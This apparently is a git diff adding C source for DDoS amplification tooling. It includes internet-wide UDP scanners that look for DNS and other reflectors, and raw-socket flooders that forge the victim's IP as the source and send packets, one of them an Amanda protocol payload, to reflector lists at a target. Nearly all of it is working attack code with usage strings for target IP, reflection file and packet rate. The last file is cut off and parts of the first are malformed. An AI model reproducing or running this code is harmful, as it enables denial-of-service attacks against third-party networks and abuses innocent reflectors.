#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
static unsigned int payloadsize = 16;
|
||||
static unsigned int xport = 53;
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
char payload[] =
|
||||
"\x00\x0a\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07\x56\x45\x5";
|
||||
|
||||
size = sizeof(payload);
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=size;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + payloadsize;
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - payloadsize;
|
||||
|
||||
if (body_length > 40)
|
||||
|
||||
{
|
||||
found_srvs++;
|
||||
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Shrooms Torrent Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Scan in Progress \n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Trackers Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Percent Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(7001);
|
||||
udph->check = 0;
|
||||
memset((void *)udph + sizeof(struct udphdr), 0x01, 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 7001;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 64;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(10080);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x41\x6d\x61\x6e\x64\x61\x20\x32\x2e\x33\x20\x52\x45\x51\x20\x48\x41\x4e\x44\x4c\x45\x20\x30\x30\x30\x2d\x36\x35\x36\x33\x37\x33\x37\x33\x20\x53\x45\x51\x20\x39\x35\x34\x35\x36\x38\x38\x30\x30\x0A\x53\x45\x52\x56\x49\x43\x45\x20\x61\x6d\x61\x6e\x64\x61\x0A", 64);
|
||||
udph->len=htons(sizeof(struct udphdr) + 64);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
